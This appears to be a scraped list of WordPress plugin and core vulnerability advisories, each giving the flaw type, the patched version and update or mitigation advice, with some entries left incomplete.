Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Logaster Logo Generator

Vulnerability: Cross-Site Request Forgery to Arbitrary Media Deletion and Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-dTree

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Embed Youtube Video

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: Display custom fields in the frontend – Post and User Profile Fields

Vulnerability: Missing Authorization via vg_display_data shortcode
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Subscribe To Comments Reloaded

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 150820
Recommended Action: Update to version 150820, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Information Exposure
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: Mass Delete Taxonomies

Vulnerability: Cross-Site Request Forgery via mp_plugin_mass_delete_tags_init
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: WP Custom Fields Search

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.35
Recommended Action: Update to version 1.2.35, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: 1.5.67
Recommended Action: Update to version 1.5.67, or a newer patched version

Plugin: Classic Editor and Classic Widgets

Vulnerability: Cross-Site Request Forgery via render_settings_page
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Insight Core

Vulnerability: Authenticated PHP Object Injection & Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mercado Pago payments for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: MailArchiver

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Auto Delete Posts

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Unauthenticated Sensitive Information Exposure via ai-debug-processing-fe
Patched Version: 2.7.31
Recommended Action: Update to version 2.7.31, or a newer patched version

Plugin: IMPress for IDX Broker

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Error Log Viewer by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: SQL Injection
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Allow svg files

Plugin: WP Academic People List

Plugin: Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3.12
Recommended Action: Update to version 3.3.12, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Request Forgery to Feedback Submission
Patched Version: 1.3.32
Recommended Action: Update to version 1.3.32, or a newer patched version

Plugin: Powerkit – Supercharge your WordPress Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Caldera Forms Pro

Vulnerability: Missing Authorization
Patched Version: 1.7.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.7.7, 1.8.2

Plugin: WP Helper Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Image Slider by NextCode – Photo & Video Slider

Vulnerability: Cross-Site Request Forgery to Slide Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Connections Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.9.4
Recommended Action: Update to version 0.7.9.4, or a newer patched version

Plugin: WebToffee WP Backup and Migration

Vulnerability: Missing Authorization via wt_delete_schedule
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: SlickNav Mobile Menu

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Magic Action Box

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker Pro

Vulnerability: Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Advance WordPress Search Plugin

Vulnerability: Missing Authorization to Plugin Settings Reset
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Real Media Library: Media Library Folder & File Manager

Vulnerability: Authenticated (Author) Stored Cross-Site Scripting
Patched Version: 4.14.2
Recommended Action: Update to version 4.14.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Comments
Patched Version: 4.0.4
Recommended Action: Update to one of the following versions, or a newer patched version: 4.0.4, 4.1.4, 4.2.1

Plugin: AIT CSV import/export

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: SQL Injection
Patched Version: 3.45
Recommended Action: Update to version 3.45, or a newer patched version

Plugin: Improved Include Page

Vulnerability: Authenticated (Contributor+) Arbitrary Posts/Pages Access
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form by FormGet – Best Form Builder Plugin for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: Export customers list csv for WooCommerce, WordPress users csv, export Guest customer list

Vulnerability: CSV Injection
Patched Version: 2.0.69
Recommended Action: Update to version 2.0.69, or a newer patched version

Plugin: Product Import Export for WooCommerce – Import Export Product CSV Suite

Vulnerability: Authenticated(Shop Manager+) Arbitrary File Upload via upload_import_file
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: secupress-pro

Vulnerability: Unauthenticated Arbitrary IP Ban
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: SQL Injection via gid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Order Barcodes

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: YITH Maintenance Mode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WP Advanced Importer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: WPRealty

Plugin: Log WP_Mail

Plugin: Stock Sync for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Ripe HD FLV

Plugin: Transposh WordPress Translation

Vulnerability: Reflected Cross-Site Scripting via tp_tp
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: EZPZ One Click Backup

Vulnerability: Unauthenticated Command Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via upload[]
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Manage Calameo Publications by Athlon

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Subscribers and Landing Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: PublishPress Capabilities – User Role Editor, Access Permissions, Admin Menus

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: IDPay for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: OMFG Mobile Pro

Plugin: Link Checker Professional

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.17.0
Recommended Action: Update to version 1.17.0, or a newer patched version

Plugin: Sniplets

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting via ‘title’
Patched Version: 3.6.22
Recommended Action: Update to version 3.6.22, or a newer patched version

Plugin: Starter Templates — Elementor, WordPress & Beaver Builder Templates

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: PayPal Currency Converter BASIC for WooCommerce

Vulnerability: Path Traversal to Arbitrary File Read
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Easy PayPal Shopping Cart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.11
Recommended Action: Update to version 1.1.11, or a newer patched version

Plugin: Ad Invalid Click Protector (AICP)

Vulnerability: SQL Injection
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: SSL Mixed Content Fix

Vulnerability: Missing Authorization on handle_installation function
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Image Over Image For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: All In One Favicon

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Request Forgery to Submitted Response Deletion
Patched Version: 1.3.2.5
Recommended Action: Update to version 1.3.2.5, or a newer patched version

Plugin: ZYREX POPUP

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 10.6.7
Recommended Action: Update to version 10.6.7, or a newer patched version

Plugin: File Manager Pro – Filester

Vulnerability: <= 1.7.6
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Membership Plugin – Restrict Content

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: MW Font Changer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: List Petfinder Pets

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.0.19
Recommended Action: Update to version 1.0.19, or a newer patched version

Plugin: Opening Hours

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Import
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Better Click To Tweet

Vulnerability: Missing Authorization
Patched Version: 5.10.4
Recommended Action: Update to version 5.10.4, or a newer patched version

Plugin: Booking Calendar | Appointment Booking | Bookit

Vulnerability: Authentication Bypass
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.7
Recommended Action: Update to version 3.5.7, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.3.9.6
Recommended Action: Update to version 2.3.9.6, or a newer patched version

Plugin: Author Box, Guest Author and Co-Authors for Your Posts – Molongui

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Car Rental System

Vulnerability: SQL Injection
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Admin+ SQL Injection via forum_id
Patched Version: 1.15.15
Recommended Action: Update to version 1.15.15, or a newer patched version

Plugin: Paymattic – Secure, Simple Payment & Donation with Subscription Payments, Recurring Donations, Customer Management

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: ZoomSounds – WordPress Wave Audio Player with Playlist

Vulnerability: WordPress Wave Audio Player with Playlist <= 6.45
Patched Version: 6.50
Recommended Action: Update to version 6.50, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Path Traversal to Remote Code Execution
Patched Version: 2.3.30
Recommended Action: Update to version 2.3.30, or a newer patched version

Plugin: HTML5 Audio Player- Best WordPress Audio Player Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Missing Authorization via woof_meta_get_keys()
Patched Version: 1.3.4.3
Recommended Action: Update to version 1.3.4.3, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.1.2
Recommended Action: Update to version 2.6.1.2, or a newer patched version

Plugin: Modal Survey – WordPress Poll, Survey & Quiz Plugin

Vulnerability: Authorization Bypass
Patched Version: 2.0.1.8.2
Recommended Action: Update to version 2.0.1.8.2, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: AM-HiLi

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Sensitive Data Exposure via debug log file
Patched Version: 1.18.0
Recommended Action: Update to version 1.18.0, or a newer patched version

Plugin: OptionTree

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Contact Form By Mega Forms – Drag and Drop Form Builder

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: WordPress Automatic Plugin

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 3.53.3
Recommended Action: Update to version 3.53.3, or a newer patched version

Plugin: WP phpMyAdmin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.2.0.4
Recommended Action: Update to version 5.2.0.4, or a newer patched version

Plugin: Polylang

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Async JavaScript

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.21.06.29
Recommended Action: Update to version 2.21.06.29, or a newer patched version

Plugin: Professional Social Sharing Buttons, Icons & Related Posts – Shareaholic

Vulnerability: Information Disclosure
Patched Version: 9.7.6
Recommended Action: Update to version 9.7.6, or a newer patched version

Plugin: Smart External Link Click Monitor [Link Log]

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in savetranslation function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: cartflows-pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.13
Recommended Action: Update to version 1.11.13, or a newer patched version

Plugin: Lock User Account

Vulnerability: Cross-Site Request Forgery to Account Lock/Unlock
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Authenticated(Teacher+) SQL Injection via ClassID
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Rus-To-Lat

Vulnerability: Cross-Site Request Forgery to Plugins Options Changes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP DS FAQ Plus

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Dropshix

Vulnerability: Authorization Bypass
Patched Version: 4.0.14
Recommended Action: Update to version 4.0.14, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via give_ajax_store_payment_note
Patched Version: 2.25.3
Recommended Action: Update to version 2.25.3, or a newer patched version

Plugin: WooCommerce Blocks

Vulnerability: Authorization Bypass
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Ad Inserter Pro

Vulnerability: Arbitrary File Modification
Patched Version: 2.7.16
Recommended Action: Update to version 2.7.16, or a newer patched version

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Level Four Store Front

Vulnerability: Arbitrary File Upload
Patched Version: 8.1.15
Recommended Action: Update to version 8.1.15, or a newer patched version

Plugin: Message ticker

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Low-Privileged Stored Cross-Site Scripting
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: feedburner-feedsmith

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WpStream – Live Streaming, Video on Demand, Pay Per View

Vulnerability: Cross-Site Request Forgery via wpstream_update_local_event_settings
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.9.10
Recommended Action: Update to version 2.9.10, or a newer patched version

Plugin: Nice PayPal Button Lite

Plugin: BuddyPress

Vulnerability: Missing Authorization to Unauthorized Group Access
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: Database Backups

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Missing Authorization on ‘hubspot_support_request’ AJAX function
Patched Version: 1.23.3
Recommended Action: Update to version 1.23.3, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘logFilter’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Post to Twitter

Plugin: Multi Rating

Vulnerability: Cross Site Request Forgery
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: User Meta Manager

Plugin: Better Tag Cloud

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Clockwork SMS Notfications

Vulnerability: Multiple Versions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SL User Create

Vulnerability: Information Disclosure
Patched Version: 0.2.5
Recommended Action: Update to version 0.2.5, or a newer patched version

Plugin: Browser and Operating System Finder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Page Builder by SiteOrigin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: WP Social AutoConnect

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Leyka

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.30.3
Recommended Action: Update to version 3.30.3, or a newer patched version

Plugin: Panorama – WordPress Project Management Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Creative Mail – Easier WordPress & WooCommerce Email Marketing

Vulnerability: Cross-Site Request Forgery to Settings Disconnect
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Handsome Testimonials & Reviews

Vulnerability: Authenticated SQL Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Remote Content Shortcode

Vulnerability: Authenticated(Contributor+) Local File Inclusion via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Seamless Donations is Sunset

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.13
Recommended Action: Update to version 5.1.13, or a newer patched version

Plugin: Logo Scheduler – Great for holidays, events, and more

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Autoptimize

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Critical CSS Rules
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: YITH WooCommerce Ajax Product Filter

Vulnerability: Cross-Site Scripting
Patched Version: 3.11.1
Recommended Action: Update to version 3.11.1, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘queue_posts’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: candidate-application-form

Plugin: MZ MBO Access

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Authenticated (Administrator+) SQL Injection in projects_list and total_projects
Patched Version: 3.3.20
Recommended Action: Update to version 3.3.20, or a newer patched version

Plugin: Migrate Users

Plugin: JetElements

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Attachment Download
Patched Version: 2.6.13.1
Recommended Action: Update to version 2.6.13.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: WP-Polls

Vulnerability: Race Condition
Patched Version: 2.77.0
Recommended Action: Update to version 2.77.0, or a newer patched version

Plugin: Organization chart

Vulnerability: Missing Authorization
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WPaudio MP3 Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery via process_bulk_action()
Patched Version: 2.9.21
Recommended Action: Update to version 2.9.21, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Highlight Focus

Plugin: ActivityPub

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Sensitive Post Title Exposure
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Laposta Signup Basic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: EMC – Easily Embed Calendly Scheduling Features

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Responsive Tabs For WPBakery Page Builder (formerly Visual Composer)

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Missing Authorization via ajax_save_state
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated Information Disclosure
Patched Version: 6.6.2
Recommended Action: Update to version 6.6.2, or a newer patched version

Plugin: WP-Polls

Vulnerability: SQL Injection
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: Five Star Restaurant Menu and Food Ordering

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.4.11
Recommended Action: Update to version 2.4.11, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Easy Media Download

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: GarageSale

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Easy Student Results

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

